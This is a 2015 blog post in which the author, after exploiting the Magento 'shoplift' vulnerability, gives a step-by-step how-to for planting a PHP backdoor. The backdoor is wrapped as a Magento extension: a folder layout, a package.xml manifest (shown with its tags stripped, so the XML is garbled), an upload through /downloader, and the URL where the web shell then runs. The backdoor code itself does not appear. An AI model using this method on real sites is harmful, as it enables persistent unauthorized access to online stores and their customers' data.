Title: Writing a simple extension/backdoor for Magento Date: 2015-11-15 17:15 ![shoplift logo]({static}/images/shoplift_logo.png) I was exploiting the [shoplift vulnerability]( https://magento.com/security-patch ) on a [Magento]( https://magento.com/ ) instance, and I was looking for a practical (as in *easy* and *clean*) way to get a shell. Of course, I could have chained [CVE-2015-1398]( http://www.cvedetails.com/cve/CVE-2015-1398/ ) and [CVE-2015-1399]( http://www.cvedetails.com/cve/CVE-2015-1399/ ) like [Checkpoint did]( http://blog.checkpoint.com/2015/04/20/analyzing-magento-vulnerability/ ), but I was way too lazy. Instead, I decided to write an [extension module]( http://www.magentocommerce.com/magento-connect/ ) and to install it. Since the internet is full of either outdated or way, way, way, way too complex tutorials about how to write a **simple fucking extension with a single stupid php file**, here is a quick how-to: I didn't want to read the url-rewriting code of magento, so I decided that my backdoor will be under the `errors` folder. Write (or get) a php backdoor, and put it into an `errors` folder, create a `package.xml` file like this one, and put everything into a `tar.gz` file, like this: ```bash $ tree . ├── errors │   └── backdoor.php └── package.xml ``` That's it, you have your module, you can now upload it on `http://yourmagentoinstan.ce/downloader`, and access your backdoor on `http://yourmagentoinstan.ce/errors/backdoor.php`. ```xml backdoor 1.3.3.7 devel backdoor community Backdoor for magento Backdoor for magento backdoor jvoisin jvoisin julien.voisin@dustri.org 2015-08-17 5.2.0 6.0.0 ``` The `hash` tag is the `md5sum` of your file (here, `backdoor.php`).